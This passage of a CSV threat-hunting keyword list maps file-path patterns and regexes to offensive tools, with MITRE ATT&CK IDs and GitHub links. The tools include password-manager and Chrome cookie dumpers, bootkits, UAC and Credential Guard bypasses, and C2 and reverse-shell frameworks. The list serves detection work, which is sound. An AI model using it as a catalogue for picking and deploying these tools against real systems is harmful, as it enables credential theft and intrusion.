FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\BITB-main*",".{0,1000}\\BITB\-main.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*\bitdefender\getCredsbitdefender.h*",".{0,1000}\\bitdefender\\getCredsbitdefender\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\bitdefender\getCredsbitdefender2.h*",".{0,1000}\\bitdefender\\getCredsbitdefender2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\bitwarden\plugin\getCredsbitwardenPluginChrome.h*",".{0,1000}\\bitwarden\\plugin\\getCredsbitwardenPluginChrome\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\bitwarden\plugin\getCredsbitwardenPluginChrome2.h*",".{0,1000}\\bitwarden\\plugin\\getCredsbitwardenPluginChrome2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\Blackout.cpp*",".{0,1000}\\Blackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.exe*",".{0,1000}\\Blackout\.exe.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.sln*",".{0,1000}\\Blackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.sys*",".{0,1000}\\Blackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.sys*",".{0,1000}\\Blackout\.sys.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*\Blackout.vcxproj*",".{0,1000}\\Blackout\.vcxproj.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\blindeventlog.exe*",".{0,1000}\\blindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*\block_dll_policy.exe*",".{0,1000}\\block_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\BloodHound.exe*",".{0,1000}\\BloodHound\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*\BloodHoundGui\*.exe*",".{0,1000}\\BloodHoundGui\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*\BloodHound-win32-X64*",".{0,1000}\\BloodHound\-win32\-X64.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*\BOF-Template\x64\*",".{0,1000}\\BOF\-Template\\x64\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*\Boot\EfiGuardDxe.efi*",".{0,1000}\\Boot\\EfiGuardDxe\.efi.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\bootkit-rs*",".{0,1000}\\bootkit\-rs.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","0","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*\brc.zip*",".{0,1000}\\brc\.zip.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*\BrowserEnum.log*",".{0,1000}\\BrowserEnum\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\BrowserEnum.log*",".{0,1000}\\BrowserEnum\.log.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\BrowserExfelterator.cs*",".{0,1000}\\BrowserExfelterator\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\browserhistory.csv*",".{0,1000}\\browserhistory\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\BrowserLogger.ps1*",".{0,1000}\\BrowserLogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\browsinghistoryview\browsinghistoryview64.exe*",".{0,1000}\\browsinghistoryview\\browsinghistoryview64\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\bruteforce-ftp.py*",".{0,1000}\\bruteforce\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\bruteforce-http.py*",".{0,1000}\\bruteforce\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\Bruteforcer.*",".{0,1000}\\Bruteforcer\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*\bruteforce-rdp.py*",".{0,1000}\\bruteforce\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\bruteforce-smb.py*",".{0,1000}\\bruteforce\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\bruteforce-ssh.py*",".{0,1000}\\bruteforce\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\bypass-clm.exe*",".{0,1000}\\bypass\-clm\.exe.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*\bypass-clm.sln*",".{0,1000}\\bypass\-clm\.sln.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*\bypass-clm\Program.cs*",".{0,1000}\\bypass\-clm\\Program\.cs.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*\BypassCredGuard.cpp*",".{0,1000}\\BypassCredGuard\.cpp.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*\BypassCredGuard.exe*",".{0,1000}\\BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*\BypassCredGuard.exe*",".{0,1000}\\BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\BypassCredGuard.log*",".{0,1000}\\BypassCredGuard\.log.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*\bypasscredguard.pdb*",".{0,1000}\\bypasscredguard\.pdb.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*\bypassuac.txt*",".{0,1000}\\bypassuac\.txt.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*\bypassuac-x64.dll*",".{0,1000}\\bypassuac\-x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\C$\wh0nqs.txt.*",".{0,1000}\\C\$\\wh0nqs\.txt\..{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\c2_server.py*",".{0,1000}\\c2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*\C2concealer*",".{0,1000}\\C2concealer.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*\C2Prank.ps1*",".{0,1000}\\C2Prank\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\C2ReverseProxy\*",".{0,1000}\\C2ReverseProxy\\.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\C2ReverseServer*",".{0,1000}\\C2ReverseServer.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\C2script\*.ashx*",".{0,1000}\\C2script\\.{0,1000}\.ashx.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\C2script\*.jsp*",".{0,1000}\\C2script\\.{0,1000}\.jsp.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\C2script\*.php*",".{0,1000}\\C2script\\.{0,1000}\.php.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\CachedGPPPassword.cs*",".{0,1000}\\CachedGPPPassword\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\CamHacker\*",".{0,1000}\\CamHacker\\.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*\capcom_sys_exec.x64.dll*",".{0,1000}\\capcom_sys_exec\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\catspin-main\*",".{0,1000}\\catspin\-main\\.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*\ccmpwn.py*",".{0,1000}\\ccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*\ccmpwn\*",".{0,1000}\\ccmpwn\\.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*\certipy.pfx*",".{0,1000}\\certipy\.pfx.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*\Chakra.dll*",".{0,1000}\\Chakra\.dll.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*\chaos.exe*",".{0,1000}\\chaos\.exe.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*\CHAOS-5.0.1.zip*",".{0,1000}\\CHAOS\-5\.0\.1\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*\CHAOS-master.zip*",".{0,1000}\\CHAOS\-master\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*\charlotte.cpp*",".{0,1000}\\charlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*\charlotte.py*",".{0,1000}\\charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense 